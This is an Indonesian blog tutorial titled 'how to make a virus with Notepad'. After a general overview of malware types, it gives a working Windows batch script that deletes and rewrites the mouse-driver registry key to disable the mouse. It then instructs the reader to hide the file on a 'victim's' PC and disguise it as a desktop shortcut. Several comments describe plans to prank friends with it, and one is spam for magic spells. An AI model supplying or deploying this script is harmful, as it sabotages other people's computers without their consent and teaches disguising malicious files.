Sabtu, 07 Mei 2016

Cara Membuat Virus Menggunakan Notepad

Cara Membuat Virus Menggunakan Notepad - Virus Komputer merupakan program yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Pada artikel ini Anda akan diajak untuk mengenal apa itu virus, mengetahui jenis -jenis virus, dan belajar membuat virus sederhana namun mematikan menggunakan notepad. Silakan disimak baik - baik. Ini dia Cara Membuat Virus Menggunakan Notepad.

Cara Membuat Virus Menggunakan Notepad
Cara Membuat Virus Menggunakan Notepad

Cara Membuat Virus Menggunakan Notepad


Cara Kerja Virus
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU, Mac, FreeBSD, OS/2 IBM, dan Sun Operating System. Virus yang ganas akan merusak perangkat keras.

Jenis - Jenis Virus
Virus komputer adalah sebuah istilah umum untuk menggambarkan segala jenis serangan terhadap komputer. Dikategorikan dari cara kerjanya, virus komputer dapat dikelompokkan ke dalam kategori sebagai berikut: 
  1. Worm - Menduplikatkan dirinya sendiri pada harddisk. Ini membuat sumber daya komputer (Harddisk) menjadi penuh akan worm itu. 
  2. Trojan - Mengambil data pada komputer yang telah terinfeksi dan mengirimkannya pada pembuat trojan itu sendiri. 
  3. Backdoor - Hampir sama dengan trojan. Namun, Backdoor bisanya menyerupai file yang baik-baik saja. Misalnya game. 
  4. Spyware - Virus yang memantau komputer yang terinfeksi. 
  5. Rogue - merupakan program yang meniru program antivirus dan menampilkan aktivitas layaknya antivirus normal, dan memberikan peringatan-peringatan palsu tentang adanya virus. Tujuannya adalah agar pengguna membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue tersebut. Juga rogue dapat membuka celah keamanan dalam komputer guna mendatangkan virus lain. 
  6. Rootkit - Virus yang bekerja menyerupai kerja sistem komputer yang biasa saja. 
  7. Polymorphic Virus - Virus yang gemar beubah-ubah agar tidak dapat terdeteksi. 
  8. Metamorphic Virus - Virus yang mengubah pengkodeannya sendiri agar lebih sulit dideteksi. 
  9. Virus Ponsel - Virus yang berjalan di telepon seluler, dan dapat menimbulkan berbagai macam efek, mulai dari merusak telepon seluler, mencuri data-data di dalam telepon seluler, sampai membuat panggilan-panggilan diam-diam dan menghabiskan pulsa pengguna telepon seluler. 

Langkah Langkah Membuat Virus

1. Buka Notepad lalu input script di bawah ini :
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------
2. Lalu "Save As" Beri Format ".bat".
3. Simpan File di Tempat Tersembunyi di Pc Korban.
4. Lalu "Klik Kanan" pada dekstop korban. Pilih "New" - "Shortcut". Lalu input lokasi Virus tadi.

Input Lokasi Virus
Input Lokasi Virus 

5. Beri nama pada shortcut tersebut.

Memberi Nama Pada Shortcut
Memberi Nama Pada Shortcut


6. Lalu ganti shortcut icon, Setelah itu klik "OK".

Mengganti Shortcut Icon
Mengganti Shortcut Icon
7. Virus siap bekerja.


Link Download Script Virus :

Jika Anda menginginkan berbagai macam virus notepad, Anda bisa mendownloadnya.
- Sript Virus Notepad


Itulah seputar artikel tentang Cara Membuat Virus Menggunakan Notepad. Artikel ini dibuat untuk sekedar pengetahuan, kerusakan komputer atau penyalahgunaan di luar Tanggung jawab Saya. Selamat mencoba, terimakasih.

Artikel Terkait

Cara Membuat Virus Menggunakan Notepad
4/ 5
Oleh

29 komentar

7 Mei 2016 11.15 delete

dulu saya pernah membuat virus pakai notepad. tapi virus tersebut hilang satelah komputer direstart

Reply
avatar
7 Mei 2016 11.17 delete

Tutor ayahab ini bos.
Ayahab bagi temen ane yg kusebar virus :D

Reply
avatar
7 Mei 2016 11.22 delete

ohhh jadi gitu.. thanks yo
comment back dong :)
www.cie-inc.blogspot.com

Reply
avatar
7 Mei 2016 11.23 delete

waw...bs ngerjain teman ni. wkwkwkwkw......!tp teman yg jahil gt.

Reply
avatar
7 Mei 2016 11.30 delete

Bisa-bisa disalahgunakan mas, apalagi penyebaran virus terbilang cepat. :)

Tapi mudah dihapusnya sih :)

Reply
avatar
7 Mei 2016 11.35 delete

Kalau yang ini beda gan. Virus ada sampai kapanpun.

Reply
avatar
7 Mei 2016 11.36 delete

Rajah aja gan temenya!! haha..

Reply
avatar
7 Mei 2016 11.36 delete

Owhh jadi gitu toh cara Buat Virus Dan Cara Kerjanya. Baru tau aku gan, makasih infonya sangat bermanfaat.

Reply
avatar
7 Mei 2016 11.37 delete

Ok meluncur kak. Sering - sering mampir kesini ya.

Reply
avatar
7 Mei 2016 11.38 delete

Boleh sih, asal jangan berlebihan ya.

Reply
avatar
7 Mei 2016 11.39 delete

Iya gan. Tapi tenang aja, ini virus sederhana, mudah dihilangkan.

Reply
avatar
7 Mei 2016 11.43 delete

Iya sama - sama gan. Itu masih virus sederhana kok, yang mematikan masih banyak.

Reply
avatar
7 Mei 2016 12.19 delete

thanks gan infonya ane jadi bisa ngerjain laptop temen nih

Reply
avatar
7 Mei 2016 15.45 delete

iya gan sama - sama. Selamat mencoba.

Reply
avatar
7 Mei 2016 16.19 delete

wahh tutorialnyaa boleh dicobaa nih,buat ngisengin temen hehe

Reply
avatar
7 Mei 2016 17.08 delete

keren Tutorialnya..., makasih ya sudah diajarin.

Silahkan berkunjung.
Belajar Teknik Kendaraan Ringan.
mriptek.blogspot.co.id

Reply
avatar
7 Mei 2016 20.59 delete

wow di bahas secara detail. bagus"

Reply
avatar
8 Mei 2016 10.08 delete

Kalau virus yang satu ini itu berpengaruh gak mas sama komputernya ?

Reply
avatar
10 Mei 2016 08.50 delete

Ok meluncur gan. Sering - sering mampir kesini.

Reply
avatar
10 Mei 2016 08.51 delete

Kalau ada yang kurang jelas, silakan ditanyakan aja kak.

Reply
avatar
11 Mei 2016 13.12 delete

Ternyata notepad bisa digunakan untuk membuat virus juga mas baru tahu saya, kalau saya sih biasa menggunakan notepad untuk menulis.

Reply
avatar
13 Mei 2016 19.48 delete Komentar ini telah dihapus oleh administrator blog.
avatar
21 Mei 2016 14.25 delete

buat macem macem mah bisa gan notepad.

Reply
avatar
22 Mei 2016 00.47 delete

Wah Kapok main beginian kang,, takut kualat,, udah pernah main ginian, alhasil diUsir dari Warnet

Reply
avatar
25 Agustus 2016 10.24 delete

[ILMU PENGASIHAN]
Ilmu ini umum di kenal di pesantren yang biasa disebut dengan ilmu mahabbah atau trend-nya pengasihan atau pelet.
Ilmu ini diambil dari kisah nabi sulaiman saat manaknukkan ratu bilqis, atas dasar itulah ilmu ini saya beri nama pengasihan sulaiman.
Amalan ini bisa langsung digunakan tanpa puasa atau laku khusus, yang penting yakin bahwa apa yang kita baca akan berhasil.
Dibawah ini ucapan lafat berbagai ilmu pengasihan yang bisa anda praktekan..

INGAT RESIKO DI TANGGUNG PENUMPANG, PENULIS GAK TANGGUNG JAWAB,
INI DIMAKSUDKAN AGAR SIAPA SAJA BERHATI HATI DENGAN SI HIDUNG BELANG


MANTRA LULUS UJIAN APAPUN

MENAKLUKAN ATASAN/BOS/PIMPINAN

Mantra Ilmu Pelet sukma ningrat sejati

Ilmu Pelet Ampuh karya ulama besar

Ilmu pelet ampuh TARUB JODOH

AJIAN SEMAR MESEM

sriwulan Ilmu pengasihan ampuh

mantra pelet ampuh BHATARI PAKSI

ilmu pengasihan untuk dagang

Ilmu pengasihan jarak jauh Aji dewa manik

Mantra pengasihan manjur Ajian Si Luh Jonggo

ilmu pelet ampuh tanpa puasa

Amalan Pemikat ampuh

Ilmu Pengasihan Ratu Sejagat

Amalan Penarik Sukma

asma pelet nurul jamal

Cara Bangkitkan Nafsu Syahwat Jarak Jauh

Ilmu pelet Asmara Tantra

Ilmu Pengasihan As Sajdah

Ilmu Pengasihan dengan Asmaul Husna

Ilmu Pengasihan Guno-guno

Ilmu Pengasihan Gendam Sukma

Ilmu pelet paling manjur Aji Pancer Sukma

Ilmu Pengasihan Arjuna

Ilmu Pengasihan agung

Ilmu pelet melalui pandangan mata

Mantera Ilmu Pelet Birahi

Membuat Cewek Mimpi Basah

Ilmu pelet untuk Menarik Cinta

Ilmu Pelet Muda-mudi

Ilmu Pengasihan Kanoman

Azimat Cepat Jodoh

Azimat Pengasihan Jabat Tangan

MEMPENGARUHI PIMPINAN ATAU ATASAN DENGAN SEMEDI MAWAR

Azimat Keramat Pelaris Dagangan

Cara membuat Dompet Selalu Terisi UANG







































































































Selamat mencoba, Semoga bisa memberikan manfaat...
Master Ilmu Gendam dan Ilmu Pelet JAWA
>>> ILMU PELET JAWA MANJUR | JGN COBA2 ILMU HITAM INI!!! |
ILMU GENDAM 1000% BERHASIL <<<

Reply
avatar

Mohon masukkan saran / kritikan Anda. Atau tanyakan sesuatu yang tidak Anda pahami. Free promosi asal sopan.